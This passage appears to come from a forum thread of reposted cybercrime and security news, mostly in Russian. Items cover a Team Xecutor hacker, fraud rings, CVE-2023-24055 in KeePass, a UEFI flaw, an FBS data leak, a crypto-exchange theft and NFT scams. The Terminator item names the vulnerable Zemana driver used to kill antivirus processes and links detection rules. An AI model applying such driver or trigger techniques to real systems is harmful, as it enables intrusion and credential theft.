Примечательно, что сам хакер отрицает свою связь с Team Xecutor, хотя в рамках соглашения о сотрудничестве со следствием Гэри Боузер назвал его своим подельником. Теперь за французом охотится не только Nintendo, но и Минюст США.
Как уже упоминалось, Луарн был арестован в Танзании в 2020 году, но был отпущен на свободу после того, как суд признал его арест незаконным. На частном самолете хакеру удалось скрыться от ФБР и улететь во Францию.
Хотя дома Луарн живет сравнительно свободной жизнью, его заграничные банковские счета и криптовалютные кошельки заморожены, а правовые тиски сжимаются все сильнее.
Как бы то ни было, хакер не намерен сдаваться. По его словам, законы США защищают интересы крупных корпораций и «готовы уничтожать конкурентов, прикрывая простые коммерческие споры уголовным законодательством».
«Сейчас отбывать наказание было бы сложнее, поскольку я должен заботиться о своем отце. У меня есть 16-летняя дочь и скоро появится второй ребенок», - отмечает Луарн.
Компания Samsung официально представила Galaxy Quantum 2 — смартфон со
встроенным чипом безопасности QRNG.
Компания Samsung показала смартфон Galaxy Quantum2, оснащенный технологией квантовой криптографии для защиты данных.
Samsung Quantum 2 оснащён специальным чипом, разработанный ID Quantique – это самый маленький в мире генератор квантовых случайных чисел (QRNG), площадь которого составляет 2,5×2,5 мм.
Чип работает, улавливая случайный шум с помощью светодиода и датчика изображения CMOS. Это позволяет владельцам смартфонов использовать сервисы, требующие повышенной безопасности, за счёт генерации непредсказуемых случайных чисел без шаблонов. Такая технология чрезвычайно сложна для взлома без физического доступа к устройству.
Устройство оснащено экранной панелью Dynamic AMOLED 2X, размер диагонали которой составляет 6,7-дюйма, а разрешение соответствует формату Quad HD+. Частота обновления изображения – 120 Гц.
Устройство работает на чипе Qualcomm Snapdragon 855 Plus с 8 ядрами Kryo 485. Оперативная память равна 6 Гбайт, а флеш-память — 128 Гбайт.
Продажи Samsung Quantum 2 в Южной Корее стартуют с 23 апреля. Стоимость
смартфона пока не сообщается.
Подробнее:
https://www.securitylab.ru/news/518800.php
Интерпол объявил, что в ходе международной операции правоохранительные органы задержали 31 подозреваемого киберпреступника и выявили более 1 300 вредоносных серверов, которые использовались для проведения фишинговых атак и распространения вредоносного ПО.
Согласно заявлению Интерпола, операция под названием Operation Synergia, которая проходила с сентября по ноябрь 2023 года, была начата в ответ на активный рост, эскалацию и профессионализацию транснациональной киберпреступности, а также на необходимость скоординированных действий против новых киберугроз.
В операции были задействованы правоохранительные органы 55 стран и несколько частных компаний. Уничтожено 70% выявленных серверов управления и контроля (Command and Control, C2) — в основном в Европе, Гонконге и Сингапуре — а другие сервера в настоящее время находятся в руках спецслужб.
Помимо 31 ареста, Интерпол выявил еще 70 подозреваемых, ответственных за фишинговые атаки, распространение банковского вредоносного ПО и программ- вымогателей. В ходе расследования были раскрыты крупные киберпреступные группировки, но их названия и происхождение не уточняется.
• Source: [https://www.interpol.int/fr/Actuali...L-led-operation-targets- growing-cyber-threats](https://www.interpol.int/fr/Actualites-et- evenements/Actualites/2024/INTERPOL-led-operation-targets-growing-cyber- threats)
• Source: [https://www.unodc.org/documents/Cyb...ontribution_to_the_AHC_Concluding_Session.pdf](https://www.unodc.org/documents/Cybercrime/AdHocCommittee/Concluding_session/Submissions/Multi- Stakeholders/INTERPOL_Contribution_to_the_AHC_Concluding_Session.pdf)
«Сотрудниками Управления экономической безопасности и противодействия коррупции ГУ МВД России по Московской области совместно с коллегами из Рузского городского округа пресечена деятельность группы, участники которой подозреваются в мошенничестве.
Предварительно установлено, что жителю Московской области позвонил неизвестный и, представившись сотрудником банка, сообщил, что с его счета пытаются несанкционированно снять денежные средства. А для приостановления данной процедуры мужчине необходимо идентифицировать голос и сообщить номер своей банковской карты. Он выполнил данные требования, однако спустя час ему снова поступил звонок. В этот раз собеседник представился генерал-майором полиции и заявил, что на гражданина пытаются незаконно оформить кредит. Чтобы предотвратить это, якобы необходимо прийти в банк и заключить кредитное соглашение на максимально возможную сумму.
Доверчивый мужчина согласился и отправился в банковское отделение, где получил одобрение на кредит в размере 5 миллионов рублей. Затем с ним снова связались неизвестные и попросили перевести данные денежные средства на указанные счета. Потерпевший перечислил им 4,2 миллиона рублей, после чего аферисты перестали выходить на связь.
Следователем отдела МВД России по Рузскому городскому округу Московской области возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ.
В результате крупномасштабной операции на территории города Белгорода полицейские задержали пятерых подозреваемых: четырех мужчин и одну женщину. Всем им избрана мера пресечения в виде заключения под стражу.
Сотрудниками подмосковной полиции при участии коллег из Белгородской области проведено шесть обысков по местам проживания фигурантов. Изъято около 300 сим- карт, более 100 банковских карт, 22 мобильных телефона и ноутбуки, имеющие доказательственное значение для уголовного дела.
Есть основания полагать, что участники группы могут быть причастны к ряду аналогичных эпизодов мошеннических действий.
В настоящее время продолжаются оперативно-розыскные мероприятия и следственные действия, направленные на установление всех обстоятельств противоправной деятельности».
Обнаружили уязвимость в Phoenix SecureCore UEFI. Ей присвоен идентификатор CVE-2024-0762 и оценка CVSS 7,5. Во всех процессорах Intel с названием «Lake» присутствует уязвимость в прошивке SecureCore. Обнаруженная проблема может влиять на разные модели ноутбуков от известных производителей, в числе которых Lenovo, Dell, Acer и HP. Уязвимость CVE-2024-0762 — это ошибка переполнения буфера в модуле Trusted Platform Module (TPM). С помощью CVE-2024-0762 можно повысить себе привилегии и ускорить выполнение кода.
Неизвестные обратились к основателю компаний Tesla и SpaceX Илону Маску от
имени хакерского коллектива Anonymous, обвинили его в пренебрежении интересами
простых любителей криптовалюты и «объявили войну». Об этом сообщает New York
Post.
В видеоролике, опубликованном в Twitter, человек в маске Гая Фокса утверждает,
что прежде Илон Маск пользовался хорошей репутацией из-за своих вложений в
электромобили и освоение космоса. Однако теперь даже его поклонники начинают
понимать, что Маск — всего лишь самовлюбленный богатей, который готов на все
ради того, чтобы на него обратили внимание. «Вы можете считать себя самым
умным человеком, но теперь вы встретили достойного соперника. Мы Anonymous. Мы
легион. Мы идем», — говорится в сообщении
Миллионы частных инвесторов возлагали большие надежды на доходы от
криптовалюты, чтобы улучшить свою жизнь. Конечно, они сами пошли на риск,
когда вкладывали свои деньги. Все знают, что нужно быть готовым к
неустойчивости курса крипто. Но твои твиты на этой неделе демонстрируют полное
пренебрежение интересами обычного рабочего человека
Anonymous
Через 20 минут после публикации видео Илон Маск
написал в
Twitter: «Не
убивайте то, что ненавидите, а спасайте то, что любите».
В мае сообщалось, что Илон Маск приостановил продажу электромобилей за
биткоины из-за неэкологичного способа получения этой криптовалюты. После этого
криптовалюта потеряла в цене более десяти процентов за три дня. 4 июня Маск
опубликовал твит с ее упоминанием и эмодзи с разбитым сердцем. Это привело к
падению курса биткоин еще на тысячу долларов.
Назойливый сосед остался без интернета и с запретом.
Соединенные Штаты имеют богатую историю диковинных судебных разбирательств. Институт правовых реформ Торговой палаты США перечислил «легкомысленные» иски: от всего, что связано с мясом Taco Bell, до Velveeta Mac N' Cheese, который слишком долго готовится, и Crocs, которые сжимаются на жаре.
Тем не менее, один конфликт может просто получить награду как самый нелепый повод подать в суд на кого-либо. Недавно произошел очередной случай абсурдного судебного иска: житель многоквартирного дома в течение двух лет бесплатно пользовался интернетом своей соседки, а после установки пароля потребовал доступ к сети через суд.
Рик Коннор, истец, утверждал, что доступ к интернету был необходим для его работы. Судья, пораженный нелепостью иска, уточнил у Коннора, действительно ли тот хочет получить доступ к Wi-Fi соседки через суд. Коннор уверенно подтвердил свои намерения.
На заседании Рик рассказал, что живет напротив соседки Дженнифер уже два года и все это время пользовался её интернетом без проблем, пока не появился пароль. По его словам, он несколько раз вежливо просил Дженнифер предоставить ему пароль, но получал отказ.
Судья поинтересовался, знала ли Дженнифер о том, что Коннор пользовался её интернетом. Женщина ответила, что поняла это только тогда, когда счёт за интернет вырос до неприемлемого уровня. Первоначально её ежемесячный платёж составлял около 100 долларов, но со временем увеличился до 150 долларов.
Коннор заявил, что считает себя вправе пользоваться Wi-Fi соседки, так как ему мешала громкая музыка, которую Дженнифер включала в своей квартире. Однако судья не принял эти аргументы и задал Коннору простой вопрос: почему бы ему не подключить собственный интернет?
Конфликт между соседями продолжал обостряться. Дженнифер рассказала, что Коннор часто стучит к ней в дверь в любое время суток, оставляет записки с требованием предоставить пароль. Одна из таких записок содержала просьбу, в которой он утверждал, что его работа зависит от доступа к Wi-Fi.
Судья не только отклонил иск Коннора, но и вынес временный запретительный ордер, запрещающий ему беспокоить Дженнифер. Коннору запретили стучать в дверь соседки и оставлять записки. Судья подчеркнул, что в случае нарушения запрета, дело будет пересмотрено.
instituteforlegalreform.com/blog/the-most-ridiculous-lawsuits-of-2023/
Маск рассматривает радикальные меры безопасности после двух покушений на его жизнь.
Илон Маск, основатель Tesla и SpaceX, заявил, что рассматривает возможность создания костюма в стиле Железного Человека после того, как за последние восемь месяцев на его жизнь было совершено два покушения.
«Возможно, пришло время построить этот летающий металлический костюм», – написал Маск на платформе X после того, как фанаты выразили беспокойство по поводу его безопасности на фоне покушения на бывшего президента США Дональда Трампа.
Click to expand...
Некоторые пользователи предложили Маску усилить свою охрану после инцидента на предвыборном митинге Трампа в Батлере, Пенсильвания. Один из комментаторов отметил:
«Если они могут прийти за Трампом, они придут и за тобой».
Click to expand...
Маск заявил, что «впереди опасные времена», добавив , что «двое людей (в разные времена) уже пытались убить меня за последние 8 месяцев». По его словам, преступники были задержаны с оружием примерно в двадцати минутах езды от штаб-квартиры Tesla в Техасе, но подробностей он не раскрыл.
Эти заявления последовали после того, как Маск «полностью» поддержал Трампа в качестве кандидата на пост президента, возложив вину на Секретную службу за недопущение инцидента.
Нападение произошло 13 июля, когда пуля задела ухо Трампа через 15 минут после начала его речи перед сторонниками. В результате атаки один человек из толпы погиб, двое были серьезно ранены. Стрелком оказался 20-летний Томас Мэтью Крукс.
Фанаты часто сравнивают Маска с реальным Тони Старком, а сценарист «Железного Человека» Марк Фергус однажды назвал его одним из источников вдохновения для создания персонажа Marvel. В 2010 году Маск снялся в эпизодической роли в фильме «Железный Человек 2», а в 2021 году встретился с инженером Диланом Ланге Эдмистоном, который построил собственный прототип костюма.
Click to expand...
There's an ongoing discussion about the Keepass Password Manager software that's driving its users and the community crazy: https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
The software, in a default installation, is subject to a certain attack where, if the machine where compromised, an attacker could inject a special Keepass trigger to export the whole password database without the user of a master password once the database has been opened. There are certain mitigations to this problem as stated by a maintainer https://sourceforge.net/p/keepass/feature-requests/2773/#d326 where a user could turn this behaviour off by default.
It's true that an attacker would first need access to the machine but the users' are complaining that this issue should be fixed whereas the developers say this functionality is perfectly normal and have so far refused to patch it.
There's already a CVE created for this purpose and it's under analysis.
Sources:
https://nvd.nist.gov/vuln/detail/CVE-2023-24055
https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
https://sourceforge.net/p/keepass/feature-requests/2773/
На русскоязычных хак-форумах распространяется инструмент под названием Terminator. Его продавец под ником Spyboy утверждает, что Terminator способен остановить любой антивирус, XDR и EDR-платформу. Однако эксперты из компании CrowdStrike пришли к выводу, что по сути Terminator представляет собой красиво поданную BYOVD-атаку — bring your own vulnerable driver («принеси свой уязвимый драйвер»).
В таких атаках легитимные драйверы, подписанные действительными сертификатами и способные работать с привилегиями ядра, сбрасываются на устройства жертв, чтобы отключить защитные решения и в итоге захватить систему.
Spyboy заявляет, что Terminator способен обходить 24 различных антивируса, а также EDR (Endpoint Detection and Response) и XDR (Extended Detection and Response) решения, включая Windows Defender на устройствах под управлением Windows 7 и более поздних версий.
Автор оценивает Terminator в 300 долларов за обход одного защитного решения (при этом нельзя приобрести версию только для обхода SentinelOne, Sophos, CrowdStrike, Carbon Black, Cortex, Cylance) и 3000 долларов за полную версию. Также в объявлении Spyboy подчеркивает, что программы-вымогатели и блокираторы запрещены, и он не несет ответственности за подобные действия.
Перед использованием Terminator «клиентам» Spyboy понадобятся административные привилегии в целевых системах под управлением Windows, а также они должны обманом вынудить пользователя разрешить работу инструмента в окне User Account Controls (UAC), которое отобразится при запуске.
Исследователи из компании CrowdStrike рассказывают, что Terminator попросту помещает легитимный подписанный драйвер ядра Zemana (zamguard64.sys или zam64.sys) в папку C:\Windows\System32\ под случайным именем, насчитывающим от 4 до 10 символов. Когда вредоносный драйвер записан на диск, Terminator загружает его и использует привилегии на уровне ядра, чтобы ликвидировать user-mode процессы антивирусного и защитного ПО, работающего на устройстве.
Хотя неясно, как именно Terminator взаимодействует с драйвером, еще в 2021 году был выпущен PoC-эксплоит, который использует недостатки в драйверах для выполнения команд с привилегиями ядра Windows, и этим можно воспользоваться для завершения процессов защитного ПО.
По данным VirusTotal, в настоящее время используемый драйвер обнаруживается как уязвимый и потенциально вредоносный только одним антивирусным движком. Однако специалисты компании Nextron Systems уже поделились правилами [YARA ](https://github.com/magicsword-io/LOLDrivers/blob/main/detections/yara/yara- rules.yar)и Sigma ([по хешу ](https://github.com/magicsword- io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml)и [по имени](https://github.com/magicsword- io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers_names.yml)), которые помогут защитникам обнаружить уязвимый драйвер, используемый Terminator.
Житель американского города Вестпорт потерял $3 000 000 после того, как мошенники из Пакистана убедили его вложиться в криптовалюту.
В отчёте говорят, что мыли бивни ещё с января. Они убедили мужчину перевести деньги с пенсионного счёта на криптовалютный, под названием Kraken. После мошенники сняли с криптовалютного счета жертвы $3 000 000.
Они отследили транзы и заморозили все счета, связанные с операциями мошенников, а значит и счёт какого-нибудь другого Джона тоже, ведь через него проходила грязная цепь. В результате расследования детективы узнали, что злоумышленники живут в Пакистане.
С арестованных счетов и кошельков удалось собрать $3 200 000 и вернуть потерпевшему. Фиксируем пояса, господа!
source: westportct.gov/home/showpublisheddocument/80653/638315801404200000
По мнению властей, преступники используют скиммеры, чтобы считывать данные с карт жертв. Кардеры не выбирают суммы: у них уходят даже 100-150 долларов.
Некоторые американцы становятся жертвами несколько раз: "Они забрали все!", — рассказала одна из пострадавших, которой уже второй раз за три месяца украли все пособия.
Это новость удивительна, потому что реальный кардинг считается устаревшим направлением. Его начали "хоронить" более 10 лет назад, но реальщики иногда появляются в новостях.
millions of users around the world.
The team of security researchers at WizCase led by Ata Hakcil discovered a massive trove of data belonging to FBS, a prominent online trading broker with offices in Belize and Cyprus.
FBS is home to 16 million traders and 400,000 partners from over 190 countries.
According to researchers, FBS exposed almost 20 terabytes worth of data comprising over 16 billion records. As a result, millions of FBS customers had their personal and sensitive information accessible online.
It is worth noting that the data was left open to public access on an [Elasticsearch server](https://www.hackread.com/polecat-data-analytics-data- breach-30tb-data-exposed/) without any security authentication. This means that anyone with knowledge of unsecured databases could have downloaded the data with no password required.
The data, that was thoroughly analyzed by the WizCase team included:
Country
Addresses
Full names
IP addresses
Email addresses
Phone numbers
Passport numbers
Operating system
Mobile device models
Emails sent to FBS users
Social media IDs including Facebook and Google
What’s worse is that the company also exposed files sent by users for account verification or identity confirmation. This included the following:
The fact that FBS uploaded unredacted credit cards on a web server and left them exposed for public access could have a devastating impact on unsuspecting users including empty bank account, identity theft, extortion, and blackmailing scams to name a few.
However, the list of exposed data does not end here. In their blog post, Chase Williams of WizCase wrote that FBS also exposed its users’ IDs, their login history, unencrypted passwords encoded in base64, links to reset the password, and other sensitive information.
WizCase told Hackread.com that the data was exposed on the 1st of October 2020 which remained open to public access till the 5th. On the other hand, FBS secured the data within 30 minutes upon disclosure from the researchers.
It is unclear whether the data was accessed by malicious third parties. Nevertheless, if you have an account with FBS it is advised to get in touch with the company and inquire about the breach.
Furthermore, change your FBS password along with passwords on other services and watch out for [phishing emails and SMSishing links](https://www.hackread.com/tiktok-vulnerability-hackers-access-phone- numbers/) on your smartphone.
The report of Efta Management Center states:
The cyber-attackers who managed the Phoenix ransomware have been arrested. The head of the ransomware's main network and coder, who is currently a student, has been arrested. They were also caught with the cooperation of FATA police and Interpol
Житель Екатеринбурга рассказал, что к нему домой в шесть часов утра пришли представители силового ведомства из-за того, что он обсуждал в частной переписке в сети "ВКонтакте" как добывать оружие в одной из компьютерных игр.
Как сообщает Телеграм-канал Baza, по словам геймера силовики попросили открыть дверь и провести осмотр квартиры и его телефона.
Правоохранители объяснили, что поводом к визиту стала переписка молодого человека с приятелем в сети "ВКонтакте", в ходе которой он описывал, кто должен принести селитру и уголь, чтобы делать порох.
Геймер показал переписку силовикам и объяснил, что речь шла лишь об игровом процессе в компьютерной игре. По его словам, в рамках организационно-розыскных мероприятий у него в квартире был проведен осмотр шкафов. При этом в постановлении о проведении ОРМ говорилось, что он может использоваться иностранными спецслужбами и подконтрольными им организациями РДК и "Легион Свобода России", которые признаны в России террористическими.
10 января Долинский районный суд Ивано-Франковской области вынес решение о штрафе в 34 000 местному жителю, который распространял вирусы, выдавая их за читы для игры Among Us.
Как говорится в материалах дела, обвиняемый распространял вредоносные программные технические средства, предназначенные для несанкционированного вмешательства в ркомпьютеры.
6 декабря 2020 года он с собственного компьютера Asus загрузил на своей странице Vov Chok в видеохостинга YouTube ссылки для загрузки файла Among-US- Cheat-by-Create.apk с использованием файлообменника.
Он осознавал, файлообменник осуществляет архивирование указанного файла и добавляет к нему свой программный код, который придает ему свойства вредоносного программного обеспечения. В свою очередь файлообменник предоставил пользователям круглосуточный доступ для загрузки указанного файла.
Загрузка способствовала установке вредоносного программного обеспечения, предназначенного для вмешательства в работу компьютеров под видом программы, которая предоставляет уникальные возможности игроку компьютерной игры Among Us.
Согласно заключению эксперта, файл Among-US-Cheat-by-Create.apk признан троянским вирусом.
Таким образом, ответчика по делу обвииняют в распространении вредных программных средств, предназначенных для несанкционированного вмешательства в работу компьютеров.
Он виноват и искренне раскаялся. Также пообещал содействовать расследованию и сотрудничать с Ивано-Франковской областной прокуратурой в раскрытии уголовных правонарушений другими хакерами.
Стороны согласовали для обвиняемого наказание в виде штрафа в размере 34 000 грн. Суд такой приговор поддержал.
Кроме того, обвиняемому хакеру придется оплатить 6 211 судебного сбора.
Бывший специалист безопасности Amazon был крайне неосторожен в своих поисковых запросах, что и послужило его аресту.
Американский специалист по кибербезопасности обвиняется в хакерской атаке на криптобиржу и похищении криптовалюты на сумму около 9 миллионов долларов. Судя по всему, белый хакер стал чёрным, но отыгрывал свою законопослушную роль до самого конца.
Вчера прокуратура Южного округа Нью-Йорка выдвинула обвинения 34-летнему Шакибу Ахмеду, бывшему старшему инженеру по безопасности в «международной технологической компании», в краже и отмывании денежных средств в особо крупных размерах.
В резюме специалиста отражены навыки, помимо прочего, обратной разработки смарт-контрактов и аудита блокчейна, которые являются весьма специализированными и могли быть использованы Ахмедом в злонамеренной деятельности.
В документах Министерства юстиций не уточняется, где именно работал Ахмед, однако в его профиле LinkedIn в качестве места работы указана компания Amazon. На официальные запросы СМИ представители Amazon подтвердили информацию, но заявили, что Ахмед больше не работает в компании.
Хотя прокуроры не уточнили, какая именно биржа стала жертвой атаки, сайт новостей о криптовалюте CoinDesk сообщил, что описание и дата атаки соответствуют нападению на Crema Finance, биржу на базе Solana, которое произошло в начале июля 2022 года. Именно эти даты фигурируют в обвинении бывшего специалиста безопасности Amazon.
Как сообщается, после похищения криптовалюты в размере 9 миллионов долларов, хакер вернул большую часть обратно на криптобиржу в результате определённой договорённости. В частности, Ахмед предложил оставить себе «лишь» 1,5 миллиона за «оказание услуг пентеста», и вернуть оставшиеся 7,5 миллионов бирже, если та согласится не передавать информацию об атаке правоохранительным органам.
Это очень распространенная практика в мире криптопреступлений. Хакеры часто договариваются с представителями криптобирж о подобных вещах, и загнанным в угол представителям подобных платформ, как правило, некуда деваться, и они идут на условия хакеров. Однако, как наглядно демонстрирует этот случай, возврат части крипто-добычи совсем не означает, атакуемая компания не обратится в соответствующие органы.
«Ахмед использовал свои навыки инженера по безопасности компьютеров, чтобы украсть миллионы долларов. Затем он якобы пытался скрыть похищенные средства, но его навыки не смогли сравниться с навыками Киберпреступной единицы Уголовного расследования Налоговой службы», — гордо заявляет специальный агент Тайлер Хэтчер, который работает в уголовном расследовательском отделе Налоговой службы США.
Согласно обвинительному заявлению, Ахмед якобы использовал уязвимость на бирже и вставил «фальшивые данные о ценах, чтобы мошенническим образом сгенерировать миллионы долларов стоимости завышенных комиссий, которые он на самом деле не заработал, но все равно смог вывести».
Затем, по данным федералов, Ахмед якобы отмывал похищенную криптовалюту «через серию транзакций», таких как обмен токенов, «переход» от выручки с блокчейна Solana к блокчейну Ethereum и другие.
Позже Ахмед, как сообщается, искал в интернете информацию о хакерской атаке, «своей уголовной ответственности», адвокатах, которые имели опыт в подобных делах, возможности расследования такой атаки правоохранительными органами и «бегстве из США, чтобы избежать уголовных обвинений».
Вполне возможно, на хакера бы не удалось выйти, если бы он был аккуратнее в своих поисковых запросах. Тем временем, каждое из предъявленных мужчине обвинений предусматривает максимальное наказание вплоть до 20 лет тюремного заключения. Неясно, стоила ли игра свеч, но сейчас злоумышленник явно жалеет о том, что год назад не поступил иначе.
source: justice[.]gov/usao-sdny/pr/former-security-engineer-international- technology-company-arrested-defrauding
Пресс-служба Костромского УМВД сообщает о достаточно редком по нынешнем временам успехе оперативнников угрозыска, которые сумели «вычислить» и привлечь к ответственности интернет-мошенника по его ай-пи адресу.
Началось все с того, что некий костромич-меломан решил продать сабвуфер (разновидность звуковой колонки с расширенным диапазоном воспроизводимых частот).
Объявление о продаже гаджета он разместил в интернете на одном из популярных сайтов онлайн-торговли — и вскоре получил ответ: некто собирался устройство купить и предлагал произвести расчет через некую службу доставки — и даже прислал ссылку на ее сайт.
Продавец сабвуфера зашел по ней и с его карты исчезли 8 тысяч рублей.
Поняв, что нарвался на очередного интернет-мошенника, костромич обратился в полицию (ни на что особенно уже не надеясь), но … полицейские смогли мошенника вычислить по ip-адресу (это набор цифр, который позволяет определить физическое местонахождение компьютера), с которого пришла ссылка.
Оказалось, что мошенник находился в городе Первоуральске Свердловской области — там его и задержали командированные на Урал оперативники, которые заодно изъяли у него компьютер, ставший орудием преступления.
Ошарашенный таким поворотом дела 26-летний гражданин от неожиданности визита правоохранителей растерялся и признал, «зарабатывал» созданием фишинговых сайтов оплаты с помощью найденной в сети программы-приложения.
В отношении мошенника (отметим, что глуповатого и не догадавшегося воспользоваться vpn-сервисами при выходе в сеть) возбуждено уголовное дело по ст. 159 УК РФ.
Colonial Pipeline заплатила почти $5 млн хакерам в пятницу. Ранее компания заявляла, что не собирается идти на поводу у вымогателей, однако сами власти признают, что иногда другого выхода у компаний может не быть.
Компания Colonial, которая управляет крупнейшим трубопроводом в США, узнала о взломе своей системы 7 мая, после чего сразу же прекратила свою деятельность — это привело к нехватке топлива и появлению ажиотажного спроса на заправочных станциях на всем Восточном побережье США.
Для возобновления работы системы Colonial Pipeline заплатила хакерам неотслеживаемой криптовалютой в течение нескольких часов после атаки. Получив платеж, хакеры предоставили оператору ключи дешифрования, чтобы восстановить его отключенную компьютерную сеть. Однако после этого система работала настолько медленно, что компания еще в течение какого-то времени продолжала использовать собственные резервные копии.
Any idea on who(which ransomware) is behind the ransomware attack happened in Gyrodata Mining tech firm?
Противоправную деятельность 27-летнего мужчины разоблачили сотрудники управления противодействия киберпреступлениям во Львовской области совместно со следователями Львовского районного управления полиции.
Хакер по заказу осуществлял взлом платных программ для технических специалистов. Мужчина вносил изменения в программный код, чтобы обойти лицензию и сделать программы бесплатными. Свои услуги рекламировал на профильных форумах, взлом одной программы стоил около 3 000 гривен. Заказчиками были преимущественно иностранные граждане. В результате таких действий правообладатели понесли почти 1,5 миллиона гривен убытков.
Кроме этого, мужчина осуществлял взлом платных программ, созданных другими хакерами для подбора паролей к социальным сетям. В дальнейшем эти программы он продавал по более низкой цене.
В доме фигуранта сотрудники полиции провели обыски и изъяли компьютерную технику, использовавшуюся в противоправной деятельности.
По данному факту открыто уголовное производство ч. 2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины. Санкция статьи предусматривает до шести лет лишения свободы. Досудебное расследование продолжается.
Процессуальное руководство в уголовном производстве осуществляет Галицкая окружная прокуратура.
Почти половина суммы всех выплат по безработице в США во время пандемии, 400 млрд долларов, оказалась в руках мошенников. Как передает ТАСС, такую оценку в четверг приводит интернет-портал Axios со ссылкой на компанию ID.me, которая специализируется на защите персональных данных.
По словам главы компании Блейка Холла, до 50% всех выплат были, вероятно, похищены преступниками с помощью фальшивых заявлений на пособия, в которых использовались украденные личные данные граждан США. По его оценкам, речь идет о сумме в 400 млрд долларов.
По информации аналитической фирмы LexisNexis Risk Solutions, до 70% похищенных средств впоследствии оказалось за границей. Масштаб и трансграничный характер мошенничества ставит эту ситуацию в ранг проблем национальной безопасности, считает Axios.
Министерство финансов США не стало комментировать эту информацию.
В апреле Федеральная торговая комиссия США заявила, что в 2020 году она получила от граждан свыше 394 тыс. жалоб на то, что их персональные данные были использованы третьими лицами для получения выплат по безработице. Рост по сравнению с 2019 годом составил почти 3 000%, подчеркнул тогда журнал Forbes.
Портал отмечает, что американские власти понимали возможность махинаций, но посчитали, что важнее обеспечить деньгами нуждающихся.
Laurence Dodds
Sun, March 14, 2021, 4:54 PM·12 min read
A Grecian statue made of black stone or metal looms out of the darkness, its
face seemingly removed to reveal a shining golden skull with a long, grotesque
tongue that snakes around the back of the statue 's neck - Hedi Xandt
David Drayton had been so excited to own some real [crypto-
art](https://www.telegraph.co.uk/technology/2021/03/06/crypto-art-becomes-new-
cultural-currency/). Intrigued by the growing buzz, the German designer paid
about €50 (£43) in cryptocurrency for a digital certificate of ownership for a
lovingly computer-rendered Grecian statue with its face worn away to reveal a
golden skull.
A few weeks later, however, he learned that the artwork had been stolen from an image put online by its real creator, Hamburg artist Hedi Xandt, and turned into a crypto-asset without Mr Xandt's knowledge or permission. "Holy sh--!" Drayton said. "I’ve been ripped off!"
He wasn't alone. Tens of millions of dollars are being poured into artworks backed by unique units of cryptocurrency known as non-fungible tokens (NFTs). Last week [Christie's closed its first ever NFT sale for $69m (£49m)](https://www.telegraph.co.uk/technology/2021/03/11/digital-artwork- snapped-69m-record-sale/).
Advocates bill NFTs as the ultimate stamp of authenticity, using blockchain technology to irrevocably verify the ownership of digital assets and giving small-time artists a transformative new source of income.
Yet for many artists the NFT market has done just the opposite, creating novel
incentives for fraudsters to profit from their work. Comic illustrators, 3D
renderers and pixel painters have all discovered their art on major exchanges,
sometimes selling for hundreds of pounds.
What is an NFT?
In one example, famed New York City hip-hop group the Wu-Tang Clan promoted
NFT art that may have violated another artist's copyright – only to remove all
traces of their involvement once word began to spread.
Meanwhile, the speculative fervour has created a honeypot for scammers using fake cryptocurrency wallets to steal thousands of pounds, as well as an alleged "pump and dump" scheme that persuaded artists to hand over money to boost the value of a currency.
In theory, NFTs are perfect for preventing art fraud. Because they are held on a blockchain – essentially a decentralised transaction log maintained by thousands of computers across the world using unbreakable encryption – they cannot simply be edited or doctored.
In 2018, however, British coder Terence Eden [highlighted a loophole](https://shkspr.mobi/blog/2018/06/how-i-became-leonardo-da-vinci-on- the-blockchain/) by registering himself with Verisart, a blockchain start-up, as the creator of the Mona Lisa. Though Verisart [took it in good humour](https://medium.com/hry-publication/why-a-random-mona-lisa-provenance- will-not-matter-on-blockchain-efabb665703b), the stunt made clear that even blockchains still depend on trusted authorities such as art galleries or auction houses to verify that an NFT is attached to the genuine article.
A screenshot from the blockchain art verification site Verisart shows
Leonardo da Vinci 's famous Mona Lisa, with its sallow colours and amused,
eyebrow-less subject, with one Terence Eden listed as the creator - Leonardo
da Vinci/Terence Eden/Verisart
Posts about art theft began appearing last September on the online forum of
Rarible, an online NFT marketplace estimated to be the most-visited, and by
December there was talk of an "influx". Now, with the flood of new attention
and money pouring into NFTs, the problem appears to have become a plague.
"Art theft has never been this aggressive and rampant ever before," says artist Chris Moschler, who said he had blocked more than 30 Twitter accounts trying to "mint" NFTs based on his tweets, often using automated tools. "I cannot understand how this is still being called a revolutionary movement in the art world."
Although very few of these mass coinages appear to have actually made money, they spread fear through the community, exacerbated by trolls who delighted in minting any tweet they could find. Many artists locked down their social media profiles, swapping lists of accounts to block and tips on how to prevent counterfeiting.
Even Star Trek actor William Shatner, who recently launched his own NFT trading cards, was affected, saying: "Authors, actors, models, photographers, etc should be concerned."
Corbin Rainbolt, a paleo-artist in Indiana, US, was one of those who deleted his paintings from Twitter and reluctantly re-posted them with watermarks. "Many small artists are struggling right now, and if someone mints a piece of art that they worked hard on and manages to make money off of it, that is a huge emotional blow," he said.
Hello all,
This afternoon, someone tagged a NFT account on my Spinosaurus painting.
As such, I have deleted all my art tweets. I am reposting them here with watermarks.
It's a bit of a gamble for me so retweets are very much appreciated and help me get my art back out there pic.twitter.com/mFABVSozmX
— Corbin Rainbolt (@CorbinRainbolt) March 9, 2021Click to expand...
"If someone were to make even a few thousand dollars off of one of my paintings without my consent, it would be absolutely devastating. And this isn't hypothetical, it’s happening to so many artists right now."
Scammers have also been buying adverts on Google searches for Metamask, a cryptocurrency wallet recommended by leading NFT exchanges, and Zapper, a crypto asset dashboard. The adverts lead to realistic-looking fake websites designed to trick users into giving their passwords.
This was how Jeremy Wolff instantly lost the $5,800 (£4,166) proceeds of his recent foray into NFTs. Since cryptocurrency transactions are not controlled by any one bank or payment processor, they cannot be reversed.
"The entire experience has made me a bit more wary and paranoid," Wolff told The Telegraph , although he still believes in NFTs and intends to relaunch his works. "What happened to me was unfortunate, and I think with a new space there will be a lot of naive people like myself that will be going too fast and be tricked like I was."
Please retweet. This story needs to be heard. Im just so sad. Please spread the word
I just had my @MetaMask wallet completely wiped out while starting my NFT career#scam #eth #metamask #bitcoin #btc #Ethereum #cryptocurrency #rarible #nft #nftartist #nfts #NFTCommunity pic.twitter.com/zoQ8609qGR
— Jeremy (@jwolffstudios) March 3, 2021Click to expand...
